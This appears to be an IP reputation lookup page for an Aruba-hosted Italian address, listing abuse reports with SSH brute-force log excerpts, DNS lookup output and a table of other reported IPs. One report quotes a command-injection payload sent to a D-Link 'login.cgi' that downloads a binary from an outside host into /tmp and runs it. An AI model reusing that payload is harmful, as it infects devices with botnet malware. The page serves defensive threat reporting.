城市(city): unknown
省份(region): unknown
国家(country): Italy
运营商(isp): Aruba S.p.A.
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): Data Center/Web Hosting/Transit
| 类型 | 评论内容 | 时间 |
|---|---|---|
| attackspam | Nov 16 11:06:21 MK-Soft-Root2 sshd[16598]: Failed password for root from 80.211.117.21 port 55566 ssh2 ... |
2019-11-16 18:28:29 |
| attackbots | 2019-11-10T18:45:35.835251shield sshd\[1565\]: Invalid user depyatic from 80.211.117.21 port 40694 2019-11-10T18:45:35.842149shield sshd\[1565\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.117.21 2019-11-10T18:45:37.339011shield sshd\[1565\]: Failed password for invalid user depyatic from 80.211.117.21 port 40694 ssh2 2019-11-10T18:49:17.392534shield sshd\[1964\]: Invalid user khurshee from 80.211.117.21 port 49186 2019-11-10T18:49:17.397951shield sshd\[1964\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.117.21 |
2019-11-11 03:14:38 |
| attackbots | Nov 4 08:33:22 auw2 sshd\[27699\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.117.21 user=root Nov 4 08:33:24 auw2 sshd\[27699\]: Failed password for root from 80.211.117.21 port 59952 ssh2 Nov 4 08:37:07 auw2 sshd\[28038\]: Invalid user manager from 80.211.117.21 Nov 4 08:37:07 auw2 sshd\[28038\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.117.21 Nov 4 08:37:09 auw2 sshd\[28038\]: Failed password for invalid user manager from 80.211.117.21 port 41358 ssh2 |
2019-11-05 02:38:14 |
| attack | Oct 30 00:38:56 localhost sshd\[26213\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.117.21 user=root Oct 30 00:38:58 localhost sshd\[26213\]: Failed password for root from 80.211.117.21 port 59552 ssh2 Oct 30 00:54:38 localhost sshd\[26300\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.117.21 user=root Oct 30 00:54:40 localhost sshd\[26300\]: Failed password for root from 80.211.117.21 port 50982 ssh2 |
2019-11-02 18:23:01 |
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 80.211.117.207 | attack | /login.cgi?cli=aa aa';wget http://157.230.29.251/bins/Solar.mips -O -> /tmp/.Solar;chmod 777 /tmp/.Solar;/tmp/.Solar dlink'$ |
2020-04-19 02:01:31 |
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 80.211.117.21
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 46621
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;80.211.117.21. IN A
;; AUTHORITY SECTION:
. 502 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019110200 1800 900 604800 86400
;; Query time: 113 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Nov 02 18:22:58 CST 2019
;; MSG SIZE rcvd: 117
21.117.211.80.in-addr.arpa domain name pointer host21-117-211-80.serverdedicati.aruba.it.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
21.117.211.80.in-addr.arpa name = host21-117-211-80.serverdedicati.aruba.it.
Authoritative answers can be found from:
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 220.246.240.210 | attack | unauthorized connection attempt |
2020-01-28 14:47:46 |
| 203.243.140.13 | attackspam | unauthorized connection attempt |
2020-01-28 14:41:43 |
| 95.156.249.198 | attackbots | unauthorized connection attempt |
2020-01-28 15:05:36 |
| 58.125.129.9 | attack | Honeypot attack, port: 81, PTR: PTR record not found |
2020-01-28 14:56:54 |
| 185.143.221.85 | attackspambots | TCP port 3389: Scan and connection |
2020-01-28 15:14:17 |
| 193.161.213.68 | attackbotsspam | unauthorized connection attempt |
2020-01-28 14:49:03 |
| 141.101.212.133 | attackbots | unauthorized connection attempt |
2020-01-28 14:51:28 |
| 198.12.62.66 | attack | unauthorized connection attempt |
2020-01-28 15:00:24 |
| 37.49.227.202 | attackspambots | unauthorized connection attempt |
2020-01-28 14:58:33 |
| 46.248.45.7 | attackbotsspam | unauthorized connection attempt |
2020-01-28 14:45:10 |
| 92.23.94.156 | attackbotsspam | unauthorized connection attempt |
2020-01-28 14:43:56 |
| 103.79.78.40 | attackspam | unauthorized access on port 443 [https] FO |
2020-01-28 15:17:06 |
| 190.109.144.157 | attackspambots | unauthorized connection attempt |
2020-01-28 14:49:35 |
| 118.25.107.120 | attack | Unauthorized connection attempt detected from IP address 118.25.107.120 to port 6380 [J] |
2020-01-28 14:39:32 |
| 179.247.252.251 | attackbots | unauthorized connection attempt |
2020-01-28 14:50:52 |